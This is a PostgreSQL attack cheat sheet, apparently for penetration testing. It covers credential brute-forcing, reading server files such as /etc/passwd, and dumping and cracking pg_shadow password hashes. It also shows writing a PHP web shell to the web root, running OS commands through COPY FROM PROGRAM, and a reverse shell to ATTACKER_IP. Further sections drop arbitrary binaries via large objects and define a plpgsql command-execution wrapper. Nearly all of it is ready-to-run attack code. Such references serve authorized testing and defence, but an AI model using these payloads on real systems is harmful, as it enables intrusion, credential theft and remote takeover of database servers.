Service Detection
nmap -sV -sC -p 5432 TARGET
Connect
psql -h TARGET -U postgres
psql -h TARGET -U postgres -d database_name
psql "postgresql://postgres:password@TARGET/database"
Brute-Force
hydra -L users.txt -P passwords.txt postgres://TARGET
crackmapexec postgres TARGET -u postgres -p passwords.txt
Default: role postgres with password postgres or blank. Whether a password is checked at all depends on the auth method pg_hba.conf assigns to the connecting host (trust, peer, md5, scram-sha-256), so a blank password may work over a local socket and fail over TCP.
Enumeration
SELECT version();
SELECT current_user;
SELECT usename, passwd FROM pg_shadow;   -- password hashes; superuser only
psql meta-commands (type each alone, without the trailing description):
\l    list databases
\dt   list tables in the current database
\du   list roles with their attributes (Superuser, Create role, Create DB)
SELECT * FROM pg_database;
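Before trying the file-read, file-write and command-execution techniques below, find out which of them the current role can actually use. The following queries are an added example, not part of the original page. The pg_read_server_files, pg_write_server_files and pg_execute_server_program roles only exist from PostgreSQL 11; on older servers only a superuser can use those features, and the role-membership query simply lists nothing relevant.

```sql
-- Who am I, and am I a superuser? (is_superuser is readable by any role)
SELECT current_user, session_user, current_setting('is_superuser') AS superuser;

-- Which predefined pg_* roles does the current role hold, directly or inherited?
-- Matching by OID rather than by name avoids an error on servers where a
-- given role does not exist.
SELECT r.rolname
FROM pg_roles r
WHERE r.rolname LIKE 'pg\_%'
  AND pg_has_role(current_user, r.oid, 'MEMBER')
ORDER BY 1;
-- pg_read_server_files      -> pg_read_file(), COPY ... FROM 'file'
-- pg_write_server_files     -> COPY ... TO 'file'
-- pg_execute_server_program -> COPY ... FROM/TO PROGRAM

-- Other roles worth targeting: superusers, and roles that can create roles or DBs
SELECT rolname, rolsuper, rolcreaterole, rolcreatedb, rolcanlogin
FROM pg_roles
WHERE rolsuper OR rolcreaterole
ORDER BY rolsuper DESC, rolname;

-- Where the server lives on disk (superuser or pg_read_all_settings only;
-- other roles get "must be superuser or have privileges of pg_read_all_settings")
SELECT current_setting('data_directory') AS data_directory,
       current_setting('config_file')    AS config_file,
       current_setting('hba_file')       AS hba_file;
```

The second query is the useful one: a role that is not a superuser but holds pg_execute_server_program can still run the COPY FROM PROGRAM commands further down.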
File Read
Needs superuser, or membership in pg_read_server_files (PostgreSQL 11+). The read happens as the OS user running the server, so files that account cannot open (e.g. /etc/shadow) are out of reach.
SELECT pg_read_file('/etc/passwd');
SELECT pg_read_file('/etc/passwd', 0, 1000);   -- offset 0, length 1000 bytes: page through large files
COPY
Same privilege requirement. COPY FROM uses text format by default: a tab splits the line into columns and backslash sequences are interpreted, so it suits /etc/passwd but not arbitrary files.
CREATE TABLE tmp(data text);
COPY tmp FROM '/etc/passwd';
SELECT * FROM tmp;
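Added example, not from the original page, that goes beyond the single pg_read_file call above: list a directory, read a large file in fixed-size chunks, read a file whose bytes are not valid in the database encoding, and pull a whole file through COPY without text-format mangling. Paths are illustrative; every call runs as the server's OS user and needs superuser or pg_read_server_files (PostgreSQL 11+).

```sql
-- List a directory. Absolute paths need superuser or pg_read_server_files.
SELECT pg_ls_dir('/etc') AS name;

-- Size and mtime first, so chunk offsets can be planned
SELECT size, modification FROM pg_stat_file('/var/log/postgresql/postgresql.log');

-- Read 4 KiB at offset 0, then the next 4 KiB. pg_read_file(path, offset, length)
-- returns text; with missing_ok = true (fourth argument, 9.5+) a missing file
-- yields NULL instead of an error, handy when probing paths blindly.
SELECT pg_read_file('/var/log/postgresql/postgresql.log', 0, 4096);
SELECT pg_read_file('/var/log/postgresql/postgresql.log', 4096, 4096);
SELECT pg_read_file('/does/not/exist', 0, 100, true) IS NULL AS missing;

-- pg_read_file() rejects bytes that are invalid in the database encoding
-- (a binary or latin1 file in a UTF8 database); pg_read_binary_file() does not.
SELECT encode(pg_read_binary_file('/etc/hostname'), 'escape');

-- COPY FROM in text format splits on tabs and interprets backslashes. CSV
-- format with a delimiter and quote byte that cannot occur in the file keeps
-- every line intact as one row (empty lines come back as NULL in CSV mode).
CREATE TEMP TABLE f(line text);
COPY f FROM '/etc/hosts' WITH (FORMAT csv, DELIMITER E'\x01', QUOTE E'\x02');
SELECT line FROM f;
```

Prefer pg_read_file with an offset and length over COPY when the file is large: the table route copies everything into the database and leaves a trace, while the function returns just the slice you asked for.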
File Write
Needs superuser or pg_write_server_files (PostgreSQL 11+). The file is created as the server's OS user, so the target directory must be writable by that account, and the result is owned by it (the web shell below only helps if the web server can read it). COPY TO writes text format: it appends a trailing newline and escapes backslashes, which does not disturb this payload.
COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';
Command Execution
COPY … FROM PROGRAM (PostgreSQL 9.3+)
Needs superuser or pg_execute_server_program (PostgreSQL 11+). The program is started through /bin/sh as the OS user the server runs as (usually postgres), and COPY does not return until the program exits.
CREATE TABLE cmd(output text);
COPY cmd FROM PROGRAM 'id';
SELECT * FROM cmd;
-- The SQL session hangs for as long as this shell is alive
COPY cmd FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"';
Large Object
Server-side lo_import and lo_export are superuser-only by default. lo_import returns the OID of the new object; pass that OID to lo_export, which writes the object's raw bytes to the given path.
SELECT lo_import('/etc/passwd');
SELECT lo_export(OID, '/tmp/output');
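Added example, not from the original page, completing the large-object round trip above and covering the byte-exact file write that the COPY TO technique in the File Write section cannot do (COPY TO emits text format, escaping backslashes and adding a trailing newline; lo_export writes the bytes unchanged). It uses psql's \gset (9.3+) to keep the returned OID in a variable instead of retyping it. The exported script content is constructed for illustration and the paths are placeholders.

```sql
-- Import a server file; the returned OID lands in the psql variable :loid
SELECT lo_import('/etc/passwd') AS loid \gset

-- Read it without exporting anything: the data sits in pg_largeobject in
-- 2 KiB pages (pageno 0, 1, ...), so concatenate in page order
SELECT convert_from(string_agg(data, ''::bytea ORDER BY pageno), 'UTF8') AS content
FROM pg_largeobject
WHERE loid = :loid;

-- Same thing in one call (PostgreSQL 9.4+)
SELECT convert_from(lo_get(:loid), 'UTF8') AS content;

-- Byte-exact write: build an object from a bytea, then export it to disk.
-- The base64 decodes to "#!/bin/sh\nid\n"; OID 0 asks the server to pick one.
SELECT lo_from_bytea(0, decode('IyEvYmluL3NoCmlkCg==', 'base64')) AS wloid \gset
SELECT lo_export(:wloid, '/tmp/probe.sh');

-- Large objects persist in the database until unlinked: remove both
SELECT lo_unlink(:loid), lo_unlink(:wloid);
```

Because lo_export writes whatever bytes the object holds, this is the route for dropping a binary (a shared object, an ELF, an SSH key file) rather than COPY TO.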
Password Hashes
SELECT usename, passwd FROM pg_shadow;   -- superuser only
md5 entries look like md5 followed by 32 hex characters and are computed as md5(password || username), so the role name is the salt. hashcat mode 12 expects each line as the 32 hex characters, a colon, and the role name; strip the md5 prefix before cracking:
hashcat -m 12 hash.txt /usr/share/wordlists/rockyou.txt
Entries beginning SCRAM-SHA-256$ (the default password_encryption since PostgreSQL 14) go to hashcat as-is with mode 28600.
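Added example, not from the original page, showing the md5 scheme behind the hashcat mode above, a way to test a few candidates without leaving the database, and queries that emit hashcat-ready lines for both hash formats. The candidate list is constructed for illustration.

```sql
-- How a PostgreSQL md5 password hash is built: 'md5' || md5(password || username).
-- Because the username is folded in, the same password hashes differently per role.
SELECT 'md5' || md5('postgres' || 'postgres') AS expected_for_postgres_postgres;

-- Test a short candidate list against every md5-hashed role in one query
SELECT s.usename, c.candidate
FROM pg_shadow s
CROSS JOIN (VALUES ('postgres'), ('password'), ('admin'), ('')) AS c(candidate)
WHERE s.passwd = 'md5' || md5(c.candidate || s.usename);

-- Export for hashcat -m 12: HEX:username (drop the 'md5' prefix, append the
-- role name as the salt)
SELECT substr(passwd, 4) || ':' || usename AS hashcat_m12
FROM pg_shadow
WHERE passwd LIKE 'md5%';

-- scram-sha-256 entries are SCRAM-SHA-256$<iterations>:<salt>$<StoredKey>:<ServerKey>;
-- the whole string is the hashcat -m 28600 input
SELECT passwd AS hashcat_m28600
FROM pg_shadow
WHERE passwd LIKE 'SCRAM-SHA-256$%';

-- Roles with no password at all can only log in where pg_hba.conf uses
-- trust, peer or another non-password method
SELECT usename FROM pg_shadow WHERE passwd IS NULL;
```

The in-database check is only worth it for a handful of candidates: md5() is cheap, but each candidate is one row per role, and a wordlist the size of rockyou belongs in hashcat, not in a CROSS JOIN.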
Wrapper Function
RCE wrapper in plpgsql
No extension is needed: plpgsql is installed by default. The caller still needs the COPY ... PROGRAM privilege (superuser, or pg_execute_server_program on PostgreSQL 11+), since the function runs with the invoker's rights:
CREATE OR REPLACE FUNCTION cmd(text) RETURNS SETOF text AS $$
BEGIN
  -- Scratch table survives for the session; clear it before each run
  CREATE TEMP TABLE IF NOT EXISTS cmd_out(line text);
  TRUNCATE cmd_out;
  -- FROM PROGRAM captures stdout (stderr merged in); %L quotes the command
  -- as a literal so embedded single quotes do not break the statement
  EXECUTE format('COPY cmd_out FROM PROGRAM %L', $1 || ' 2>&1');
  RETURN QUERY SELECT line FROM cmd_out;
END;
$$ LANGUAGE plpgsql;
SELECT cmd('id');
NSE Scripts
nmap -p 5432 --script pgsql-brute TARGET
Quick Reference
| Check | Command |
|---|---|
| Connect | psql -h TARGET -U postgres |
| Read file | SELECT pg_read_file('/etc/passwd') |
| RCE | COPY cmd FROM PROGRAM 'id' |
| Write file | COPY (SELECT 'data') TO '/path/file' |
| Dump hashes | SELECT usename, passwd FROM pg_shadow |